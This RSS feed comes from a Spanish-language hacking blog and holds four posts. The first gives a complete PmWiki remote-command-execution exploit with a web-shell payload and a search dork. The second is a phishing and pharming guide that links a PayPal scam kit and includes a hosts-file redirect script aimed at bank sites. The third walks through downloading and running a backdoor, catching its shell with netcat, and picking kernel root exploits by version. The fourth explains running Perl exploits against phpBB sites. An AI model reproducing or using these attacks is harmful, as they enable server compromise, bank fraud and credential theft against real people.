

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>BlogDelHacker &#187; ansatsu</title>
	<atom:link href="http://www.blogdelhacker.com/author/ansatsu/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.blogdelhacker.com</link>
	<description>Blog sobre seguridad, redes, vulnerabilidades, hacking linux y windows...</description>
	<pubDate>Sun, 25 Jan 2009 19:18:50 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5</generator>
	<language>en</language>
			<item>
		<title>Explotando Exploit PHP</title>
		<link>http://www.blogdelhacker.com/2009/01/02/explotando-exploit-php/%</link>
		<comments>http://www.blogdelhacker.com/2009/01/02/explotando-exploit-php/%#comments</comments>
		<pubDate>Fri, 02 Jan 2009 20:12:45 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/?p=102</guid>
		<description><![CDATA[Antes que nada nesecitamos saber/tener un par de cosas:
*Los exploits php se distinguen de esta manera  #!/usr/bin/php
*Nesecitamos un compilador (BamCompile)
Antes que nada nos descargamos el BamCompile, lo descomprimimos, lo instalamos en mi caso lo instale en C://

Posteriormente usamos un exploit yo usare de ejemplo este:

#!/usr/bin/php -q -d short_open_tag=on
&#60;?
print_r(&#8217;
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;
PmWiki &#60;= 2.1.19 Zend_Hash_Del_Key_Or_Index/remote commands execution exploit
by [...]]]></description>
			<content:encoded><![CDATA[<p>Antes que nada nesecitamos saber/tener un par de cosas:</p>
<p>*Los exploits php se distinguen de esta manera  #!/usr/bin/php</p>
<p>*Nesecitamos un compilador <a href="http://www.bambalam.se/bamcompile/download/bamcompile1.21.zip">(BamCompile)</a></p>
<p>Antes que nada nos descargamos el BamCompile, lo descomprimimos, lo instalamos en mi caso lo instale en C://</p>
<p><a href="http://www.blogdelhacker.com/wp-content/uploads/2009/01/screen11.jpg"><img class="alignnone size-medium wp-image-103" src="http://www.blogdelhacker.com/wp-content/uploads/2009/01/screen11-300x150.jpg" alt="" width="300" height="150" /></a></p>
<p>Posteriormente usamos un exploit yo usare de ejemplo este:</p>
<p><span id="more-102"></span></p>
<blockquote><p>#!/usr/bin/php -q -d short_open_tag=on<br />
&lt;?<br />
print_r(&#8217;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
PmWiki &lt;= 2.1.19 Zend_Hash_Del_Key_Or_Index/remote commands execution exploit<br />
by rgod rgod @autistici.org<br />
site: <a href="http://retrogod.altervista.org/" target="_blank">http://retrogod.altervista.org</a><br />
dork: inurl:pmwiki.php +&#8221;Page last modified on&#8221; | PmWikiPhilosophy<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
&#8216;);<br />
/*<br />
works with register_globals=On<br />
against PHP &lt; 4.4.3, 5 &lt;= PHP &lt; 5.1.4<br />
*/<br />
if ($argc&lt;5) {<br />
print_r(&#8217;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Usage: php &#8216;.$argv[0].&#8217; host path http_loc cmd OPTIONS<br />
host:      target server (ip/hostname)<br />
path:      path to pmwiki<br />
http_loc:  an http site with the code to include (without ending slash)<br />
cmd:       a shell command<br />
Options:<br />
-p[port]:    specify a port other than 80<br />
-P[ip:port]: specify a proxy<br />
Example:<br />
php &#8216;.$argv[0].&#8217; localhost /pmwiki/ <a href="http://somehost.com/" target="_blank">http://somehost.com</a> ls -la -P1.1.1.1:80<br />
php &#8216;.$argv[0].&#8217; localhost /pmwiki/ <a href="http://somehost.com/" target="_blank">http://somehost.com</a> ls -la -p81</p>
<p>Note:<br />
prepare this code in <a href="http://somehost.com/scripts/stdconfig.php/index.html" target="_blank">http://somehost.com/scripts/stdconfig.php/index.html</a> :<br />
&lt;?php<br />
error_reporting(0);set_time_limit(0);echo &#8220;my_delim&#8221;;<br />
passthru($_SERVER[&#8221;HTTP_CLIENT_IP&#8221;]);die;<br />
?&gt;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
&#8216;);<br />
die;<br />
}</p>
<p>error_reporting(0);<br />
ini_set(&#8221;max_execution_time&#8221;,0);<br />
ini_set(&#8221;default_socket_timeout&#8221;,5);</p>
<p>function quick_dump($string)<br />
{<br />
$result=&#8221;;$exa=&#8221;;$cont=0;<br />
for ($i=0; $i&lt;=strlen($string)-1; $i++)<br />
{<br />
if ((ord($string[$i]) &lt;= 32 ) | (ord($string[$i]) &gt; 126 ))<br />
{$result.=&#8221;  .&#8221;;}<br />
else<br />
{$result.=&#8221;  &#8220;.$string[$i];}<br />
if (strlen(dechex(ord($string[$i])))==2)<br />
{$exa.=&#8221; &#8220;.dechex(ord($string[$i]));}<br />
else<br />
{$exa.=&#8221; 0&#8243;.dechex(ord($string[$i]));}<br />
$cont++;if ($cont==15) {$cont=0; $result.=&#8221;\r\n&#8221;; $exa.=&#8221;\r\n&#8221;;}<br />
}<br />
return $exa.&#8221;\r\n&#8221;.$result;<br />
}<br />
$proxy_regex = &#8216;(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)&#8217;;<br />
function sendpacketii($packet)<br />
{<br />
global $proxy, $host, $port, $html, $proxy_regex;<br />
if ($proxy==&#8221;) {<br />
$ock=fsockopen(gethostbyname($host),$port);<br />
if (!$ock) {<br />
echo &#8216;No response from &#8216;.$host.&#8217;:&#8217;.$port; die;<br />
}<br />
}<br />
else {<br />
$c = preg_match($proxy_regex,$proxy);<br />
if (!$c) {<br />
echo &#8216;Not a valid proxy&#8230;&#8217;;die;<br />
}<br />
$parts=explode(&#8217;:',$proxy);<br />
echo &#8220;Connecting to &#8220;.$parts[0].&#8221;:&#8221;.$parts[1].&#8221; proxy&#8230;\r\n&#8221;;<br />
$ock=fsockopen($parts[0],$parts[1]);<br />
if (!$ock) {<br />
echo &#8216;No response from proxy&#8230;&#8217;;die;<br />
}<br />
}<br />
fputs($ock,$packet);<br />
if ($proxy==&#8221;) {<br />
$html=&#8221;;<br />
while (!feof($ock)) {<br />
$html.=fgets($ock);<br />
}<br />
}<br />
else {<br />
$html=&#8221;;<br />
while ((!feof($ock)) or (!eregi(chr(0&#215;0d).chr(0&#215;0a).chr(0&#215;0d).chr(0&#215;0a),$html))) {<br />
$html.=fread($ock,1);<br />
}<br />
}<br />
fclose($ock);<br />
#debug<br />
#echo &#8220;\r\n&#8221;.$html;<br />
}</p>
<p>$host=$argv[1];<br />
$path=$argv[2];<br />
$http_loc=$argv[3];<br />
$cmd=&#8221;";<br />
$port=80;<br />
$proxy=&#8221;";</p>
<p>for ($i=4; $i&lt;$argc; $i++){<br />
$temp=$argv[$i][0].$argv[$i][1];<br />
if (($temp&lt;&gt;&#8221;-p&#8221;) and ($temp&lt;&gt;&#8221;-P&#8221;)) {$cmd.=&#8221; &#8220;.$argv[$i];}<br />
if ($temp==&#8221;-p&#8221;)<br />
{<br />
$port=str_replace(&#8221;-p&#8221;,&#8221;",$argv[$i]);<br />
}<br />
if ($temp==&#8221;-P&#8221;)<br />
{<br />
$proxy=str_replace(&#8221;-P&#8221;,&#8221;",$argv[$i]);<br />
}<br />
}<br />
if (($path[0]&lt;&gt;&#8217;/') or ($path[strlen($path)-1]&lt;&gt;&#8217;/')) {echo &#8216;Error&#8230; check the path!&#8217;; die;}<br />
if ($proxy==&#8221;) {$p=$path;} else {$p=&#8217;http://&#8217;.$host.&#8217;:&#8217;.$port.$path;}</p>
<p>$data =&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;7d529a1d23092a\r\n&#8221;;<br />
$data.=&#8221;Content-Disposition: form-data; name=\&#8221;FarmD\&#8221;;\r\n\r\n&#8221;;<br />
$data.=&#8221;$http_loc\r\n&#8221;;<br />
$data.=&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;7d529a1d23092a\r\n&#8221;;<br />
$data.=&#8221;Content-Disposition: form-data; name=\&#8221;-1778478215\&#8221;;\r\n\r\n&#8221;;<br />
$data.=&#8221;1\r\n&#8221;;<br />
$data.=&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;7d529a1d23092a\r\n&#8221;;<br />
$data.=&#8221;Content-Disposition: form-data; name=\&#8221;-1304181425\&#8221;;\r\n\r\n&#8221;;<br />
$data.=&#8221;1\r\n&#8221;;<br />
$data.=&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;7d529a1d23092a&#8211;\r\n&#8221;;<br />
$packet =&#8221;POST &#8220;.$p.&#8221;pmwiki.php?n=PmWiki.BasicEditing?action=edit HTTP/1.0\r\n&#8221;;<br />
$packet.=&#8221;CLIENT-IP: &#8220;.$cmd.&#8221;\r\n&#8221;;<br />
$packet.=&#8221;Content-Type: multipart/form-data; boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;7d529a1d23092a\r\n&#8221;;<br />
$packet.=&#8221;Content-Length: &#8220;.strlen($data).&#8221;\r\n&#8221;;<br />
$packet.=&#8221;Host: &#8220;.$host.&#8221;\r\n&#8221;;<br />
$packet.=&#8221;Connection: Close\r\n\r\n&#8221;;<br />
$packet.=$data;<br />
sendpacketii($packet);<br />
if (strstr($html,&#8221;my_delim&#8221;)){<br />
echo &#8220;exploit succeeded&#8230;\n&#8221;;$temp=explode(&#8221;my_delim&#8221;,$html);die($temp[1]);<br />
}<br />
elseif (strstr($html,&#8221;failed to open stream&#8221;))<br />
{echo &#8220;*** adjust path&#8230; ***\n&#8221;;die($html);}<br />
else<br />
{echo &#8220;exploit failed&#8230;&#8221;;}<br />
?&gt;</p></blockquote>
<p>El codigo que les acabo de dejar lo copiamos en el bloc de notas y lo guardamos con una extension .php</p>
<p>Ahora lo compilamos: tenemos que teclear:</p>
<p>bamcompile exploit.php exploit.exe</p>
<p>siendo exploit.php el codigo que les acabo de dejar,</p>
<p><img class="alignnone" src="http://www.blogdelhacker.com/wp-content/uploads/2009/01/screen2.jpg" alt="" /></p>
<p>Ahora nos damos cuenta que se ha creado un archivo llamado exploit.exe que se encuentra en la bamcompile1.21</p>
<p>Le damos doble click al archivo exploit.exe y listo ahi vienen las instrucciones de como usarlo</p>
<p>SaLuDoS</p>
<p>St4t1k</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2009/01/02/explotando-exploit-php/%/feed</wfw:commentRss>
		</item>
		<item>
		<title>Phising y Pharming</title>
		<link>http://www.blogdelhacker.com/2008/03/08/97/%</link>
		<comments>http://www.blogdelhacker.com/2008/03/08/97/%#comments</comments>
		<pubDate>Sat, 08 Mar 2008 22:42:42 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[Asaltando Windows]]></category>

		<category><![CDATA[Asaltando los sistemas]]></category>

		<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2008/03/08/97/</guid>
		<description><![CDATA[Bien pues se escribio un tutorial asi que ya masomenos saben que es.
ahora les voy a explicar como hacerlo para digamos obtener  tarjetas de credito, logins,  que se yo&#8230;
Material:
Scam
Hacked Host
Mail list
Mailer Inbox
Primero hacemos el scam de alguna web .. aqui se los dejo es de paypal
http://rapidshare.com/files/88997799/Scam_PayPal_2008.zip.html
Lo descomprimimos, lo submos a algun hacked host [...]]]></description>
			<content:encoded><![CDATA[<p>Bien pues se escribio un tutorial asi que ya masomenos saben que es.<br />
ahora les voy a explicar como hacerlo para digamos obtener  tarjetas de credito, logins,  que se yo&#8230;</p>
<p>Material:<br />
Scam<br />
Hacked Host<br />
Mail list<br />
Mailer Inbox</p>
<p>Primero hacemos el scam de alguna web .. aqui se los dejo es de paypal<br />
http://rapidshare.com/files/88997799/Scam_PayPal_2008.zip.html</p>
<p>Lo descomprimimos, lo submos a algun hacked host o algun host que tengamos y cuando lo tenemos montado lo probamos y  nos dedicamos a buscar cuentas de correo para mandarles el scam, pueden buscar con algun extractor de mails correos , pero como<br />
siempre estan quemados y es posible que algunos no funcionen, lo mas conveniente es decirle a algun wey que se dedique a esto a que te haga el paro y te venda algun mail list para paypal (podria ser de cualquier cosa, banamex, hi5, etc ) si no buquen<br />
por la red hay bastantes, yo les recomiendo el elite extractor, o el tarantula..<span id="more-97"></span></p>
<p>Bien ya que tenemos un mail list, conseguimos algun mailer inbox, aqui les dejo la descarga de uno<br />
http://rapidshare.com/files/76390702/mailerpriv8.php</p>
<p>Lo subimos a algun hacked host, no recomiendo host gratuito porque no los envia, ya teniendolo buscamos la letter del scam<br />
(que es lo que se escribe para engañar a la victima)<br />
y si tenemos una letter para pharming nos dedicamos a crear uno <img src='http://www.blogdelhacker.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p>Antes de seguir, el pharming es un metedo que consiste en manipular las dns que usa la victima haciendole creer que entra a una web pero en realidad esta en otra (por ejemplo en el scam)</p>
<p>Ejemplo en batch<br />
<code><br />
@echo off<br />
echo ipdetuhost  www.banamex.com.mx &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.bbva.com &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.bancomer.com.mx &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.esmas.com &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
echo ipdetuhost   www.hotmail.com &gt;&gt; %windir%\system32\drivers\etc\hosts<br />
exit</code></p>
<p>Como veran de esta manera cuando la victima ejecute este archivo y entre a banamex, bbva, bancomer desde el explorador  sera redirigido a ipdetuhost y de esta manera el usuario no se va a dar cuenta que realmente esta en una web fake <img src='http://www.blogdelhacker.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Solo es teoria en general pero poco a poco AHhahAH</p>
<p>&#8211;StATiK&#8211;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2008/03/08/97/%/feed</wfw:commentRss>
		</item>
		<item>
		<title>Conectando Backdoor</title>
		<link>http://www.blogdelhacker.com/2007/03/19/conectando-backdoor/%</link>
		<comments>http://www.blogdelhacker.com/2007/03/19/conectando-backdoor/%#comments</comments>
		<pubDate>Sun, 18 Mar 2007 23:32:58 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[Asaltando los sistemas]]></category>

		<category><![CDATA[General]]></category>

		<category><![CDATA[Trabajando en Linux]]></category>

		<category><![CDATA[Trabajo en Windows]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2007/03/19/conectando-backdoor/</guid>
		<description><![CDATA[Ya que rush ha publicado, como atakar mediante rfi; Ahora nos proponemos a utilizar un exploit y un backdoor en la victima; lo primero&#8230;
nos fijamos que carpetas tienen permisos (casi siempre es en tmp)
find -perm 777
ya que nos encontramos en la carpeta vulnerable hacemos esto
cd /tmp
ahora estamos en /tmp bien, tenemos permisos para descargar cosas [...]]]></description>
			<content:encoded><![CDATA[<p>Ya que rush ha publicado, como atakar mediante rfi; Ahora nos proponemos a utilizar un exploit y un backdoor en la victima; lo primero&#8230;</p>
<p>nos fijamos que carpetas tienen permisos (casi siempre es en tmp)</p>
<blockquote><p>find -perm 777</p></blockquote>
<p>ya que nos encontramos en la carpeta vulnerable hacemos esto</p>
<blockquote><p>cd /tmp</p></blockquote>
<p>ahora estamos en /tmp bien, tenemos permisos para descargar cosas y ejecutarlas , nos disponemos a hacerlo</p>
<blockquote><p>cd /tmp;wget web/backdoor/5553; chmod 777 5553; ./5553</p></blockquote>
<p>Lo que hicimos fue, descargarlo (wget) darle permisos al archivo (chmod 777) y ejecutarlo (./5553), ahora esta trabajando sobre el puerto 5553</p>
<p>ahora nos abrimos el netcat,y de esta maneraestamos diciendole al netcat que se ponga a la escucha del puerto 5553 y que nos devuelva la shell</p>
<blockquote><p>-vv -l -p 5553</p></blockquote>
<blockquote><p>nc<br />
Cmd line: -vv -l -p 5553<br />
listening on [any] 5553 &#8230;</p></blockquote>
<p><span id="more-41"></span>Ya que nos devuelve la shell, nos fijamos que kernel lleva</p>
<blockquote><p>uname -a;pwd;id</p></blockquote>
<p>sabiendo su version sabras que r00t exploit usar, les dejo la lista para cada una&#8230;</p>
<p><code>2.4.17    -&gt; newlocal, kmod, uselib24<br />
2.4.18    -&gt; brk, brk2, newlocal, kmod<br />
2.4.19    -&gt; brk, brk2, newlocal, kmod<br />
2.4.20    -&gt; ptrace, kmod, ptrace-kmod, brk, brk2<br />
2.4.21    -&gt; brk, brk2, ptrace, ptrace-kmod<br />
2.4.22    -&gt; brk, brk2, ptrace, ptrace-kmod<br />
2.4.22-10 -&gt; loginx<br />
2.4.23    -&gt; mremap_pte<br />
2.4.24    -&gt; mremap_pte, uselib24<br />
2.4.25-1  -&gt; uselib24<br />
2.4.27    -&gt; uselib24<br />
2.6.2     -&gt; mremap_pte, krad, h00lyshit<br />
2.6.5     -&gt; krad, krad2, h00lyshit<br />
2.6.6     -&gt; krad, krad2, h00lyshit<br />
2.6.7     -&gt; krad, krad2, h00lyshit<br />
2.6.8     -&gt; krad, krad2, h00lyshit<br />
2.6.8-5   -&gt; krad2, h00lyshit<br />
2.6.9     -&gt; krad, krad2, h00lyshit<br />
2.6.9-34  -&gt; r00t, h00lyshit<br />
2.6.10    -&gt; krad, krad2, h00lyshit<br />
2.6.13    -&gt; raptor, raptor2, h0llyshit, prctl<br />
2.6.14    -&gt; raptor, raptor2, h0llyshit, prctl<br />
2.6.15    -&gt; raptor, raptor2, h0llyshit, prctl<br />
2.6.16    -&gt; raptor, raptor2, h0llyshit, prctl</code></p>
<p>ya sabiendo que exploit usar, hacemos casi lo mismo que con el backdoor, lo descargamos,</p>
<blockquote><p>wget laweb.com/exploit/kmod</p></blockquote>
<blockquote><p>Connecting to laweb.com:80&#8230; connected!<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 14,860 [text/plain]</p>
<p>0K &#8230;&#8230;&#8230;. &#8230;. 100% @ 70.79 KB/s</p>
<p>23:26:39 (70.45 KB/s) - `kmod&#8217; saved [14860/14860]</p></blockquote>
<p>, se sube, y ahora viene lo bueno le damos permisos y lo ejecutamos</p>
<blockquote><p>chmod 777 kmod; ./kmod</p></blockquote>
<p>si nos fue bien saldra algo como esto</p>
<blockquote><p>chmod 777 kmod; ./kmod<br />
[+] Attached to 30330<br />
[+] Waiting for signal<br />
[+] Signal caught<br />
[+] Shellcode placed at 0&#215;40011aed<br />
[+] Now wait for suid shell&#8230;<br />
sh-2.05#<br />
sh-2.05# id<br />
id<br />
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys)</p>
<p>4(adm),6(disk),10(wheel)</p></blockquote>
<p>y bueno ahora somos r00t, ya sabran ustedes que hacer, en la proxima entrega les dire como hacer mass deface</p>
<p>SaLuDoS</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2007/03/19/conectando-backdoor/%/feed</wfw:commentRss>
		</item>
		<item>
		<title>Ejecutando Exploit en Perl</title>
		<link>http://www.blogdelhacker.com/2007/02/17/ejecutando-exploit-en-perl/%</link>
		<comments>http://www.blogdelhacker.com/2007/02/17/ejecutando-exploit-en-perl/%#comments</comments>
		<pubDate>Sat, 17 Feb 2007 19:36:17 +0000</pubDate>
		<dc:creator>ansatsu</dc:creator>
		
		<category><![CDATA[Trabajo en Windows]]></category>

		<category><![CDATA[Utilidades Hack]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2007/02/17/ejecutando-exploit-en-perl/</guid>
		<description><![CDATA[Cuando tenemos un exploit en perl lo primero que tenemos que hacer es guardarlo en una extension .pl, posteriormentetenemos conseguir un interprete de perl (si lo deseas descargate el cygwin obviamente con aquel paquete) pero ahora lo haremos con el activeperl, lo descargas, lo instalas, y nos vamos al simbolo del sistema(estamos trabajando sbre windows) [...]]]></description>
			<content:encoded><![CDATA[<p>Cuando tenemos un exploit en perl lo primero que tenemos que hacer es guardarlo en una extension .pl, posteriormentetenemos conseguir un interprete de perl (si lo deseas descargate el cygwin obviamente con aquel paquete) pero ahora lo haremos con el <a href="http://www.activeperl.com">activeperl, </a>lo descargas, lo instalas, y nos vamos al simbolo del sistema(estamos trabajando sbre windows) y tecleamos:</p>
<blockquote><p>cd C:PerlBin</p></blockquote>
<p>El perl, lo instale en esa carpeta, si lo instalaste en otra solo es cuestion de cambiarla de directorio con el comando cd, de esta manera nos devuelve algo asi:</p>
<blockquote><p>C:PerlBin&gt;</p></blockquote>
<p><span id="more-25"></span>Ahora nos toca interpretar el exploit, y nos vamos a su carpeta con el cd.</p>
<pre></pre>
<blockquote><p>perl C:Exploitsexploit.pl</p></blockquote>
<pre></pre>
<p>Y obtendremos algo como esto:</p>
<blockquote><p>Microsoft Windows XP [Versión 5.1.2600<br />
(C) Copyright 1985-2001 Microsoft Corp.</p>
<p>C:Documents and SettingsAdministrador&gt;cd C:PerlBin</p>
<p>C:perlbin&gt;perl C:cygwinexploitshola.pl</p>
<p>***************************************************<br />
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy &lt;optional&gt;]<br />
i.e. perl nenu.pl www.site.com /forum/BigAdmin 127.0.0.1:3128<br />
****************************************************</p></blockquote>
<pre></pre>
<p>Nos dice claramente como usar el exploit, ya es de cada uno como los explota</p>
<p>Texto escrito por: ansatsu</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2007/02/17/ejecutando-exploit-en-perl/%/feed</wfw:commentRss>
		</item>
	</channel>
</rss>

